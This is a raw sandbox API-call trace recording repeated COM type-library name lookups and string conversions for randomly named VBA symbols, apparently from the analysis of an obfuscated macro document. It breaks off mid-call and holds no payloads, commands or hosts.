IUnknown:Release (This=0x631b4c0) returned 0xb [0070.019] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0070.019] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_fAAU_B", lHashVal=0x10b1b4, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0070.019] IUnknown:Release (This=0x665bd20) returned 0x6 [0070.019] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0070.019] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_fAAU_B", lHashVal=0x10b1b4, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0070.019] IUnknown:Release (This=0x665b4b0) returned 0x4 [0070.019] IUnknown:AddRef (This=0x665ba50) returned 0x10 [0070.019] IUnknown:Release (This=0x665ba50) returned 0xf [0070.019] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa9d1c3e, cbMultiByte=14, lpWideCharStr=0x144d00, cchWideChar=15 | out: lpWideCharStr="_B_var_fAAU_B") returned 14 [0070.019] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_fAAU_B", lHashVal=0x10b1b4, wFlags=0x5, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x66005f00720061, ppTypeComp=0x5f005500000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x66005f00720061, ppTypeComp=0x5f005500000000, pDummy=0x0) returned 0x0 [0070.019] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3cb2676 | out: _Dst=0x144ec0) returned 0x0 [0070.019] ITypeComp:RemoteBind (in: This=0x665ba60, szName="zBQA__", lHashVal=0x107ed7, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0070.019] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cb276a, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="zBQA__") returned 7 [0070.019] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="zBQA__", lHashVal=0x107ed7, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0070.019] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cb276a, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="zBQA__") returned 7 [0070.019] ITypeComp:RemoteBind (in: This=0x665bd30, szName="zBQA__", lHashVal=0x107ed7, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0070.020] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="zBQA__") returned 0x107ed7 [0070.020] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="zBQA__" | out: _Dst="zBQA__") returned 0x0 [0070.020] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="zBQA__") returned 7 [0070.020] IUnknown:AddRef (This=0x665ba50) returned 0x10 [0070.020] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="zBQA__", lHashVal=0x107ed7, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0070.020] IUnknown:Release (This=0x665ba50) returned 0xf [0070.020] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0070.020] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="zBQA__", lHashVal=0x107ed7, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0070.020] IUnknown:Release (This=0x631b4c0) returned 0xb [0070.020] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0070.020] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="zBQA__", lHashVal=0x107ed7, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0070.020] IUnknown:Release (This=0x665bd20) returned 0x6 [0070.020] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0070.020] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="zBQA__", lHashVal=0x107ed7, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0070.020] IUnknown:Release (This=0x665b4b0) returned 0x4 [0070.020] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cb276a, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="zBQA__") returned 7 [0070.020] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="zBQA__", lHashVal=0x107ed7, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0070.020] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x68767a0 [0070.020] _mbscpy_s (in: _Dst=0x68767a0, _DstSizeInBytes=0x7, _Src=0x3cb276a | out: _Dst=0x68767a0) returned 0x0 [0070.020] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_zBQA__") returned 0x10f980 [0070.020] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_zBQA__" | out: _Dst="_B_var_zBQA__") returned 0x0 [0070.020] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_zBQA__") returned 14 [0070.020] IUnknown:AddRef (This=0x665ba50) returned 0x10 [0070.020] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_zBQA__", lHashVal=0x10f980, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0070.020] IUnknown:Release (This=0x665ba50) returned 0xf [0070.020] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0070.021] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_zBQA__", lHashVal=0x10f980, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0070.021] IUnknown:Release (This=0x631b4c0) returned 0xb [0070.021] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0070.021] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_zBQA__", lHashVal=0x10f980, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0070.021] IUnknown:Release (This=0x665bd20) returned 0x6 [0070.021] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0070.021] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_zBQA__", lHashVal=0x10f980, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0070.021] IUnknown:Release (This=0x665b4b0) returned 0x4 [0070.021] IUnknown:AddRef (This=0x665ba50) returned 0x10 [0070.021] IUnknown:Release (This=0x665ba50) returned 0xf [0070.021] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa9d1c6e, cbMultiByte=14, lpWideCharStr=0x144d00, cchWideChar=15 | out: lpWideCharStr="_B_var_zBQA__") returned 14 [0070.021] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_zBQA__", lHashVal=0x10f980, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x7a005f00720061, ppTypeComp=0x5f004100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x7a005f00720061, ppTypeComp=0x5f004100000000, pDummy=0x0) returned 0x0 [0070.021] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3cb276a | out: _Dst=0x144ec0) returned 0x0 [0070.021] ITypeComp:RemoteBind (in: This=0x665ba60, szName="KUA_Ux1", lHashVal=0x104fe6, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0070.021] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cb2742, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="KUA_Ux1") returned 8 [0070.021] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="KUA_Ux1", lHashVal=0x104fe6, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0070.021] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cb2742, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="KUA_Ux1") returned 8 [0070.021] ITypeComp:RemoteBind (in: This=0x665bd30, szName="KUA_Ux1", lHashVal=0x104fe6, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0070.021] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="KUA_Ux1") returned 0x104fe6 [0070.021] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="KUA_Ux1" | out: _Dst="KUA_Ux1") returned 0x0 [0070.021] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="KUA_Ux1") returned 8 [0070.021] IUnknown:AddRef (This=0x665ba50) returned 0x10 [0070.022] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="KUA_Ux1", lHashVal=0x104fe6, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0070.022] IUnknown:Release (This=0x665ba50) returned 0xf [0070.022] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0070.022] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="KUA_Ux1", lHashVal=0x104fe6, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0070.022] IUnknown:Release (This=0x631b4c0) returned 0xb [0070.022] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0070.022] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="KUA_Ux1", lHashVal=0x104fe6, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0070.022] IUnknown:Release (This=0x665bd20) returned 0x6 [0070.022] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0070.022] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="KUA_Ux1", lHashVal=0x104fe6, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0070.022] IUnknown:Release (This=0x665b4b0) returned 0x4 [0070.022] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cb2742, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="KUA_Ux1") returned 8 [0070.022] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="KUA_Ux1", lHashVal=0x104fe6, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0070.022] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x68767a0 [0070.022] _mbscpy_s (in: _Dst=0x68767a0, _DstSizeInBytes=0x8, _Src=0x3cb2742 | out: _Dst=0x68767a0) returned 0x0 [0070.022] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_KUA_Ux1") returned 0x10536a [0070.022] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_KUA_Ux1" | out: _Dst="_B_var_KUA_Ux1") returned 0x0 [0070.022] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_KUA_Ux1") returned 15 [0070.022] IUnknown:AddRef (This=0x665ba50) returned 0x10 [0070.022] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_KUA_Ux1", lHashVal=0x10536a, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0070.022] IUnknown:Release (This=0x665ba50) returned 0xf [0070.022] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0070.022] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_KUA_Ux1", lHashVal=0x10536a, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0070.022] IUnknown:Release (This=0x631b4c0) returned 0xb [0070.022] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0070.022] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_KUA_Ux1", lHashVal=0x10536a, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0070.022] IUnknown:Release (This=0x665bd20) returned 0x6 [0070.022] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0070.023] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_KUA_Ux1", lHashVal=0x10536a, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0070.023] IUnknown:Release (This=0x665b4b0) returned 0x4 [0070.023] IUnknown:AddRef (This=0x665ba50) returned 0x10 [0070.023] IUnknown:Release (This=0x665ba50) returned 0xf [0070.023] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa9d1c9e, cbMultiByte=15, lpWideCharStr=0x144d00, cchWideChar=16 | out: lpWideCharStr="_B_var_KUA_Ux1") returned 15 [0070.023] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_KUA_Ux1", lHashVal=0x10536a, wFlags=0x5, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x4b005f00720061, ppTypeComp=0x55005f00000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x4b005f00720061, ppTypeComp=0x55005f00000000, pDummy=0x0) returned 0x0 [0070.023] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3cb2742 | out: _Dst=0x144ec0) returned 0x0 [0070.023] ITypeComp:RemoteBind (in: This=0x665ba60, szName="r1ABBAC", lHashVal=0x1017c5, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0070.023] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cb2792, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="r1ABBAC") returned 8 [0070.023] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="r1ABBAC", lHashVal=0x1017c5, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0070.023] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cb2792, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="r1ABBAC") returned 8 [0070.023] ITypeComp:RemoteBind (in: This=0x665bd30, szName="r1ABBAC", lHashVal=0x1017c5, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0070.023] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="r1ABBAC") returned 0x1017c5 [0070.023] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="r1ABBAC" | out: _Dst="r1ABBAC") returned 0x0 [0070.023] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="r1ABBAC") returned 8 [0070.023] IUnknown:AddRef (This=0x665ba50) returned 0x10 [0070.023] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="r1ABBAC", lHashVal=0x1017c5, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0070.023] IUnknown:Release (This=0x665ba50) returned 0xf [0070.023] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0070.023] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="r1ABBAC", lHashVal=0x1017c5, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0070.023] IUnknown:Release (This=0x631b4c0) returned 0xb [0070.024] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0070.024] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="r1ABBAC", lHashVal=0x1017c5, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0070.024] IUnknown:Release (This=0x665bd20) returned 0x6 [0070.024] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0070.024] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="r1ABBAC", lHashVal=0x1017c5, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0070.024] IUnknown:Release (This=0x665b4b0) returned 0x4 [0070.024] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cb2792, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="r1ABBAC") returned 8 [0070.024] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="r1ABBAC", lHashVal=0x1017c5, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0070.024] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x68767a0 [0070.024] _mbscpy_s (in: _Dst=0x68767a0, _DstSizeInBytes=0x8, _Src=0x3cb2792 | out: _Dst=0x68767a0) returned 0x0 [0070.024] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_r1ABBAC") returned 0x101b49 [0070.024] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_r1ABBAC" | out: _Dst="_B_var_r1ABBAC") returned 0x0 [0070.024] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_r1ABBAC") returned 15 [0070.024] IUnknown:AddRef (This=0x665ba50) returned 0x10 [0070.024] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_r1ABBAC", lHashVal=0x101b49, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0070.024] IUnknown:Release (This=0x665ba50) returned 0xf [0070.024] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0070.024] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_r1ABBAC", lHashVal=0x101b49, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0070.024] IUnknown:Release (This=0x631b4c0) returned 0xb [0070.024] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0070.024] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_r1ABBAC", lHashVal=0x101b49, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0070.024] IUnknown:Release (This=0x665bd20) returned 0x6 [0070.024] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0070.024] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_r1ABBAC", lHashVal=0x101b49, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0070.024] IUnknown:Release (This=0x665b4b0) returned 0x4 [0070.024] IUnknown:AddRef (This=0x665ba50) returned 0x10 [0070.024] IUnknown:Release (This=0x665ba50) returned 0xf [0070.025] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa9d1cce, cbMultiByte=15, lpWideCharStr=0x144d00, cchWideChar=16 | out: lpWideCharStr="_B_var_r1ABBAC") returned 15 [0070.025] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_r1ABBAC", lHashVal=0x101b49, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x72005f00720061, ppTypeComp=0x42004200000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x72005f00720061, ppTypeComp=0x42004200000000, pDummy=0x0) returned 0x0 [0070.025] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3cb2792 | out: _Dst=0x144ec0) returned 0x0 [0070.025] ITypeComp:RemoteBind (in: This=0x665ba60, szName="YAQ_wUX", lHashVal=0x102b3e, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0070.025] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cb27ba, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="YAQ_wUX") returned 8 [0070.025] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="YAQ_wUX", lHashVal=0x102b3e, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0070.025] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cb27ba, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="YAQ_wUX") returned 8 [0070.025] ITypeComp:RemoteBind (in: This=0x665bd30, szName="YAQ_wUX", lHashVal=0x102b3e, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0070.025] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="YAQ_wUX") returned 0x102b3e [0070.025] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="YAQ_wUX" | out: _Dst="YAQ_wUX") returned 0x0 [0070.025] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="YAQ_wUX") returned 8 [0070.025] IUnknown:AddRef (This=0x665ba50) returned 0x10 [0070.025] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="YAQ_wUX", lHashVal=0x102b3e, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0070.025] IUnknown:Release (This=0x665ba50) returned 0xf [0070.025] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0070.025] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="YAQ_wUX", lHashVal=0x102b3e, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0070.025] IUnknown:Release (This=0x631b4c0) returned 0xb [0070.025] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0070.025] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="YAQ_wUX", lHashVal=0x102b3e, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0070.025] IUnknown:Release (This=0x665bd20) returned 0x6 [0070.025] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0070.026] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="YAQ_wUX", lHashVal=0x102b3e, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0070.026] IUnknown:Release (This=0x665b4b0) returned 0x4 [0070.026] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cb27ba, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="YAQ_wUX") returned 8 [0070.026] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="YAQ_wUX", lHashVal=0x102b3e, wFlags=0x3, ppTInfo=0x144cf8, 